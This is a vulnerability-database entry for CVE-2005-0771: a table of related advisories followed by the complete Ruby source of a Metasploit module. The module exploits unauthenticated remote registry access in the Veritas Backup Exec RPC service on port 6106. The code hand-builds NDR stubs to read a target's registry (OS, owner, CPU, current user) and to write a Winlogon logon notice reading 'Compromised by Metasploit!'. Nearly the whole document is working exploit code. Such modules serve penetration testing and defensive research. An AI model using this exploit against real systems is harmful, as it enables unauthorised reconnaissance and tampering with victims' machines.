| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2005-0771 | 29 May 2018 15:50 | – | circl | |
| Symantec Veritas Backup Exec Server Remote Registry Access (CAN-2005-0771) | 11 Jul 2005 00:00 | – | checkpoint_advisories | |
| Veritas Backup Exec Server Remote Registry Access Code Execution - Ver2 (CVE-2005-0771) | 31 Mar 2014 00:00 | – | checkpoint_advisories | |
| CVE-2005-0771 | 29 Jun 2005 04:00 | – | cve | |
| CVE-2005-0771 | 29 Jun 2005 04:00 | – | cvelist | |
| Veritas Backup Exec Server Registry Access | 2 Dec 2006 19:48 | – | metasploit | |
| CVE-2005-0771 | 23 Jun 2005 04:00 | – | nvd | |
| [VulnWatch] iDEFENSE Security Advisory 06.23.05: Veritas Backup Exec Server Remote Registry Access Vulnerability | 24 Jun 2005 00:00 | – | securityvulns | |
| VERITAS Backup Exec Agent Unauthenticated Remote Registry Access | 8 Aug 2005 00:00 | – | nessus | |
| VERITAS Backup Exec remote registry access validation vulnerability | 24 Jun 2005 00:00 | – | cert | |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
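class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC
  include Msf::Post::Windows::Registry

  # Module metadata: name, description, references, the two selectable
  # actions, and the WARN option consumed by the 'Create Logon Notice' action.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Veritas Backup Exec Server Registry Access',
      'Description' => %q{
        This modules exploits a remote registry access flaw in the BackupExec Windows
        Server RPC service. This vulnerability was discovered by Pedram Amini and is based
        on the NDR stub information posted to openrce.org.
        Please see the action list for the different attack modes.
      },
      'Author' => [ 'hdm' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'OSVDB', '17627' ],
          [ 'CVE', '2005-0771' ],
          [ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'],
        ],
      'Actions' =>
        [
          ['System Information', 'Description' => 'Dump system info (user, owner, OS, CPU...)'],
          ['Create Logon Notice', 'Description' => 'Add a logon notice']
        ],
      'DefaultAction' => 'System Information'
    ))

    register_options(
      [
        Opt::RPORT(6106),
        OptString.new('WARN',
          [
            false,
            "The warning to display for the Logon Notice action",
            "Compromised by Metasploit!\r\n"
          ]
        ),
      ])
  end

  # Console commands this module contributes. 'regenum' is implemented
  # (cmd_regenum) but left unregistered, as the original author had it.
  def auxiliary_commands
    {
      "regread" => "Read a registry value",
      # "regenum" => "Enumerate registry keys",
    }
  end

  # Dispatch on the selected action name (see 'Actions' in initialize).
  def run
    case action.name
    when 'System Information'
      system_info
    when 'Create Logon Notice'
      logon_notice
    end
  end

  # Console command: read one registry value.
  #
  # The single argument is a backslash-separated path whose first component is
  # the hive and whose last component is the value name; everything in between
  # is the subkey. A bare hive, or no argument, just prints the usage line.
  def cmd_regread(*args)
    usage = "Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion"
    if args.empty?
      print_status(usage)
      return
    end

    paths = args[0].split("\\")
    hive = paths.shift
    subval = paths.pop
    # Nothing sensible to query when there is no hive or no value name.
    if hive.nil? || hive.empty? || subval.nil?
      print_status(usage)
      return
    end
    subkey = paths.join("\\")

    data = backupexec_regread(hive, subkey, subval)
    if data
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
    end
  end

  # Console command: enumerate a registry key.
  #
  # Takes a backslash-separated path (hive first). Note that, unlike
  # cmd_regread, the subkey sent on the wire carries a leading backslash;
  # this mirrors the original implementation and is kept as-is.
  def cmd_regenum(*args)
    usage = "Usage: regenum HKLM\\\\Software"
    if args.empty?
      print_status(usage)
      return
    end

    paths = args[0].split("\\")
    hive = paths.shift
    if hive.nil? || hive.empty?
      print_status(usage)
      return
    end
    subkey = "\\" + paths.join("\\")

    data = backupexec_regenum(hive, subkey)
    if data
      print_status("DATA: #{deunicode(data)}")
    else
      print_error("Failed to enumerate #{hive}\\#{subkey}...")
    end
  end

  # 'System Information' action: read a handful of well-known values and
  # report them, substituting a placeholder for anything that fails to read.
  def system_info
    print_status("Dumping system information...")

    win_cv = 'Software\\Microsoft\\Windows\\CurrentVersion'
    nt_cv = 'Software\\Microsoft\\Windows NT\\CurrentVersion'

    prod_id = backupexec_regread('HKLM', win_cv, 'ProductId') || 'Unknown'
    prod_name = backupexec_regread('HKLM', nt_cv, 'ProductName') || 'Windows (Unknown)'
    prod_sp = backupexec_regread('HKLM', nt_cv, 'CSDVersion') || 'No Service Pack'
    owner = backupexec_regread('HKLM', nt_cv, 'RegisteredOwner') || 'Unknown Owner'
    company = backupexec_regread('HKLM', nt_cv, 'RegisteredOrganization') || 'Unknown Company'
    cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
    username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'

    print_status("The current interactive user is #{deunicode(username)}")
    print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
    print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
    print_status("The system runs on a #{deunicode(cpu)}")
  end

  # 'Create Logon Notice' action: write the WARN text and a fixed caption to
  # the Winlogon key. Both writes are checked and the outcome is reported,
  # rather than silently assuming success.
  def logon_notice
    warn_text = datastore['WARN'].to_s
    print_status("Setting the logon warning to #{warn_text.strip}...")

    winlogon = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'
    text_ok = backupexec_regwrite('HKLM', winlogon, 'LegalNoticeText', REG_SZ, warn_text)
    caption_ok = backupexec_regwrite('HKLM', winlogon, 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')

    if text_ok && caption_ok
      print_good("Logon notice written")
    else
      print_error("Failed to write the logon notice (text: #{text_ok}, caption: #{caption_ok})")
    end
  end

  # Drop NUL bytes from a (presumably UTF-16LE) registry string and trim it
  # for display. nil is tolerated and yields an empty string.
  def deunicode(str)
    str.to_s.gsub(/\x00/, '').strip
  end

  #
  # Write a registry key (opnum 5). Returns true when the service answered
  # with a non-empty stub, false otherwise.
  #
  def backupexec_regwrite(hive, subkey, subval, type, data)
    stub = backupexec_regrpc_write(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey,
      :subval => subval,
      :type => type,
      :data => data
    )
    resp = backupexec_regrpc_call(5, stub)
    !resp.empty?
  end

  #
  # Read a registry key (opnum 4). Returns the raw value bytes, or nil when
  # the call failed or the service reported no data.
  #
  def backupexec_regread(hive, subkey, subval, type = REG_SZ)
    stub = backupexec_regrpc_read(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey,
      :subval => subval,
      :type => type
    )
    backupexec_regrpc_result(backupexec_regrpc_call(4, stub))
  end

  #
  # Enumerate a registry key (opnum 7). Same return convention as
  # backupexec_regread. The raw response size is logged at verbose level
  # instead of being dumped with `p`.
  #
  def backupexec_regenum(hive, subkey)
    stub = backupexec_regrpc_enum(
      :hive => registry_hive_lookup(hive),
      :subkey => subkey
    )
    resp = backupexec_regrpc_call(7, stub)
    vprint_status("regenum: #{resp.length} byte response")
    backupexec_regrpc_result(resp)
  end

  #
  # Decode the common read/enum response layout: two little-endian 32-bit
  # words (status, length) followed by `length` bytes of payload. Returns nil
  # for a short response, a zero status, or a zero length; a response shorter
  # than 8 bytes would otherwise make unpack return nils and crash the slice.
  #
  def backupexec_regrpc_result(resp)
    return nil if resp.nil? || resp.length < 8
    ret, len = resp[0, 8].unpack('VV')
    return nil if ret == 0 || len == 0
    resp[8, len]
  end

  #
  # Call the backupexec registry service: bind to the interface on RPORT,
  # issue one call and return its stub data ('' when there is none).
  # The connection is torn down in `ensure` so a failed call does not leak
  # the socket.
  #
  def backupexec_regrpc_call(opnum, data = '')
    handle = dcerpc_handle(
      '93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
      'ncacn_ip_tcp', [datastore['RPORT']]
    )
    dcerpc_bind(handle)
    begin
      dcerpc.call(opnum, data)
      last = dcerpc.last_response
      (last && last.stub_data) ? last.stub_data : ''
    ensure
      disconnect
    end
  end

  # RPC Service 4: build the NDR stub for a value read.
  # The trailing numeric fields (1024, 0, 4, 4) reproduce the stub layout the
  # module was derived from; their meaning is not documented here — do not
  # change them without re-checking against the original NDR description.
  def backupexec_regrpc_read(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive = opts[:hive] || HKEY_LOCAL_MACHINE
    type = opts[:type] || REG_SZ

    NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(1024) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
  end

  # RPC Service 7: build the NDR stub for a key enumeration.
  # Same caveat as backupexec_regrpc_read for the fixed fields (4096, 0, 4, 4).
  def backupexec_regrpc_enum(opts = {})
    subkey = opts[:subkey] || ''
    hive = opts[:hive] || HKEY_LOCAL_MACHINE

    NDR.UnicodeConformantVaryingString(subkey) +
      NDR.long(4096) +
      NDR.long(0) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
  end

  # RPC Service 5: build the NDR stub for a value write.
  # String types are sent as NUL-terminated UTF-16LE; the payload length is
  # written twice and the data is padded to alignment before the fixed fields.
  def backupexec_regrpc_write(opts = {})
    subkey = opts[:subkey] || ''
    subval = opts[:subval] || ''
    hive = opts[:hive] || HKEY_LOCAL_MACHINE
    type = opts[:type] || REG_SZ
    data = opts[:data] || ''

    if type == REG_SZ || type == REG_EXPAND_SZ
      data = Rex::Text.to_unicode(data + "\x00")
    end

    NDR.UnicodeConformantVaryingString(subkey) +
      NDR.UnicodeConformantVaryingString(subval) +
      NDR.long(type) +
      NDR.long(data.length) +
      NDR.long(data.length) +
      data +
      NDR.align(data) +
      NDR.long(4) +
      NDR.long(4) +
      NDR.long(hive)
  end
end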
`